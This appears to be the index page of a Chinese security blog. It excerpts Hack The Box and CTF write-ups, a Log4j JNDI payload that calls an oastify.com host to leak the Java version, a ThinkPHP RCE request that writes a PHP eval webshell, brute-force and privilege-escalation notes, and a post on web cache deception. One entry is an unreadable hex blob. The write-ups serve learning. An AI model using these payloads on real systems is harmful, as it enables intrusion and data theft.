HTB
ps 我个人是在美国的服务器上架设代理,在vps上连接openvpn,然后使用proxifier来转发流量,liunx就用proxychains4,这样虽然比较快,但是端口扫描就只能在服务器上做了常用nmap全端口扫描1nmap -sS -sV 10.129.88.187 -p- -T5 -vv
拿到shell拿到shell后先尝试提权看用户文件而后查看后台进程 ps -aux传fscan扫其他主机的服务
Meow
nmap扫太慢了,拿fscan扫可以发现开启了23端口telnet服务,尝试登陆
1telnet 10.129.150.178
直接root登陆,未授权。
正常可以用msf来爆破
kali自带自带子在1/usr/share/wordlists/legion/
Fawn
FTP存在匿名登陆 匿名账号anonymous
使用msf的ftp login 模块设置好字典,账号密码用空格分隔+1set USERPASS_FILE /usr/share/wordlists/legion/ftp-betterdefaultpasslist.txt
爆破出来后可以用 ...
NSS上的一些java题
[HZNUCTF 2023 final]ezjava
打开靶机其告诉我们会将uri的值计入log,且fastjson的版本为1.2.48首先这个版本的fastjson是不存在我们所俗知的fastjson反序列化漏洞的,其只存在原生反序列化漏洞,而题目说会将内容计入log,着让人想到了log4j的漏洞从jndi注入到log4j注入先尝试以下payload1${jndi:dns://v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com}
可以发现成功进行了dns请求者就证明了此处存在JNDI注入我们再探测以下java版本1${jndi:dns://${sys:java.version}.v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com}
可以发现其版本为1.8.0.222这个版本的java是无法直接通过ldap来进行命令执行的而题目说其fastjson的版本为1.2.48.那么我们就可以使用ldap来触发fastjson原生反序列化从而命令 ...
春秋云镜
今天不知道学点什么就氪金打了一下春秋云镜的靶场。只能说我对域的了解几乎为0。这篇文章记录一下域渗透的一些知识,和tp——cve的漏洞成因吧thinkphp5.23rce漏洞再路由随便传参数?s=asdwdwa就会发生报错,通过报错可以发现该think版本为5.23其漏洞payload如下123GET /?s=captcha_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo 'PD9waHAgZXZhbCgkX1BPU1RbMV0pO3BocGluZm8oKTs/Pg==' |base64 -d > shell.php我们直接写马通过哥斯拉来连接
其权限为www-data。我们先进行常规提权。先尝试suid提权并没有发现可以利用的命令再尝试进行sudo提权可以发现我们能够无密码使用mysql我这里贴一个sudo提权的文章Linux提权之Sudo 70种提权方法(上)Linux提权之Sudo 70种提权方法(中)Linux提权之Sudo 7 ...
agent开发构建 Harness从0-1的学习
本文学习于github项目learn-claude-code什么不是agent人们总是想当然的以为agent就是简单的提示词注入,然而实际不然。当通过过多的提示词来对AI进行限制时,AI便失去了其发散性,失去了泛化能力。
什么是agent的开发现代意义的agent的开发往往有两个意思
训练模型通过强化学习、微调、RLHF 或其他基于梯度的方法调整权重。收集任务过程数据 — 真实领域中感知、推理、行动的实际序列 — 用它们来塑造模型的行为。这是 DeepMind、OpenAI、腾讯 AI Lab、Anthropic 在做的事。这是最本义的 Agent 开发。
构建 Harness通过代码来编写一个可以提供给AI操控的环境架构。这个是本文需要学习的内容
Harness的结构123456Harness = Tools + Knowledge + Observation + Action Interfaces + PermissionsTools 工具,提供给AI调用的工具,如shell,文件读取功能,网络搜索,浏览器,数据库Knowlege 提供给Ai的知识库,上下API规范,产品文档, ...
openclow
9c18114bfffb75bea463c3ab069bee10dfdcf4a9d9459329fda899a5ff7d49dbb49905955b35cd8f57a7a6e37baca6eece9199dff91c9c80d8ec863f2c7ef6ad609a636e23992ba74d333dd12210ab18b0e4335480da1db21f464032755654c88e121ceff00a688ad39e7c939014889dbf7a523de9db5f3729deeec178b5d403861ce139c04feb33546b1732b47b11b7cd98b293ae99de05beb3a9f10732068138291d2b3e10a256f33326dc3b290629f1dbd4a1de70b162ed43ddaeda0cae7d37c9c11c4313fe8bafabf5f5dd5a417b72b0ccde1d6d1e632881ba07390e69ecf1891eb7b26593ac386525ba7cac097706df9b8fb22dee713 ...
Web缓存欺骗与punycode导致的0点击账户劫持
Web cache deception什么是缓存,什么是Cache keys?其实大家应该都知道缓存是为了加快访问而存在的,如一个学校官网,在你第一次访问时如果是会将页面存到缓存中,后面再缓存有效期的访问中都是从缓存服务器中给的响应。
而当一个页面被缓存时,你通过不同客户端访问也是可以得到相同的缓存内容的
Cache keysCache keys就是由于判断请求是否为重复相同请求的。一般是url路径加上一些请求标头
什么会被缓存1.静态文件如.js .css .jpg .txt
2.静态目录,由开发者设定
3.固定缓存路径
为什么会产生这个漏洞以及漏洞目的我们看上面的图片可以发现其存在缓存服务器和源服务器。
而这个两个服务器对应不同的web cache key,url路径的处理有可能是不同的,当这些产生差异的时候就容易产生漏洞
比如 源服务器会将; 当成分隔符直接忽略到后面的所有路径而缓存服务器不会。
而这个时候如果其缓存逻辑是我上述的1,即当路径会静态文件时就会产生缓存劫持
如果这个页面存在用户信息,比如其路径未userinfo
这时候当我们访问的是/userinfo;a.js时就 ...









